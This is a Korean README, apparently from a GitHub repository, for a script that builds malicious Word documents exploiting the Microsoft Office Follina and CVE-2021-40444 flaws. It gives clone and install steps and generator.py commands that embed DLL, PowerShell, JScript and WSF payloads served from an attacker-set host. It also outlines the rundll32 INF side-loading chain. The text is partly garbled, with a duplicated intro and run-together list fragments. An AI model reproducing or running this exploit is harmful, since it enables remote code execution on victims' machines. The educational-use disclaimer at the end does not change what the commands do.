
이 저장소는 Microsoft Office의 Follina CVE 및 CVE-2021-40444 취약점을 악용하기 위한 스크립트와 리소스를 포함합니다. 이 스크립트는 대상 시스템에서 임의의 코드를 실행할 수 있는 악성 문서 파일을 생성합니다.
이 저장소는 Microsoft Office의 Follina CVE 및 CVE-2021-40444 취약점을 악용하기 위한 스크립트와 리소스를 포함합니다. 스크립트는 대상 시스템에서 임의 코드를 실행할 수 있는 악성 문서 파일을 생성합니다.
requirements.txt에 나열됨)Flare VM 설정:
labpasswordPython 및 가상 환경:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv 패키지를 설치합니다:
pip install virtualenv
venv라는 가상 환경을 생성합니다:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
익스플로잇 생성:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132를 자신의 IP 주소로 바꾸십시오.생성된 문서 접근:
.docx 파일은 다음 디렉토리에 위치합니다:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx)가 열립니다.document.xml.rels에 저장된 악성 HTML을 가리키는 관계가 포함됩니다.%TEMP%Low 디렉토리에 저장합니다.rundll32가 INF 파일을 사이드 로드합니다.generator.pycab_parser.pyrequirements.txt에서 Python 패키지를 설치합니다.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
이 프로젝트는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고 테스트 권한이 없는 시스템에서 취약점을 악용하지 마십시오. 이 정보를 오용하면 형사 처벌을 받을 수 있습니다.